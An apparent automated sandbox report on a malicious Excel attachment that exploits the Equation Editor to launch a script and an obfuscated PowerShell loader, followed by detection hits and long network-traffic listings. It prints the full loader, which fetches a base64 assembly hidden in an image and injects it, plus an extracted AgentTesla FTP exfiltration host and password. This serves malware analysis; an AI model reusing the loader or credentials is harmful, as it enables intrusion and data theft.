t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 41.216.183.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2884, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 976, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , ProcessId: 2884, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 976, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , ProcessId: 2884, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 41.216.183.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2884, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 976, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" , ProcessId: 2884, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 976, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2200, TargetFilename: C:\Users\user\AppData\Local\Temp\22ev4n4c.e1q.ps1
                  Timestamp:07/02/24-08:22:17.801189
                  SID:2020425
                  Source Port:80
                  Destination Port:49167
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/02/24-08:22:11.705623
                  SID:2049038
                  Source Port:80
                  Destination Port:49162
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/02/24-08:22:15.357221
                  SID:2020425
                  Source Port:80
                  Destination Port:49164
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: orden de compra.xlam.xlsxAvira: detected
                  Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
                  Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
                  Source: http://192.3.243.156/ourTraditionalbase.txtVirustotal: Detection: 12%Perma Link
                  Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
                  Source: http://192.3.243.156Virustotal: Detection: 10%Perma Link
                  Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Virustotal: Detection: 5%Perma Link
                  Source: orden de compra.xlam.xlsxReversingLabs: Detection: 68%
                  Source: orden de compra.xlam.xlsxVirustotal: Detection: 47%Perma Link

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.243.156 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.478276037.0000000000270000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.482820667.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.479060921.00000000025B5000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352054E LoadLibraryW,2_2_0352054E
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035205CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205FD ShellExecuteW,ExitProcess,2_2_035205FD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205E8 ShellExecuteW,ExitProcess,2_2_035205E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352048F ExitProcess,2_2_0352048F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520622 ExitProcess,2_2_03520622
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: uploaddeimagens.com.br
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
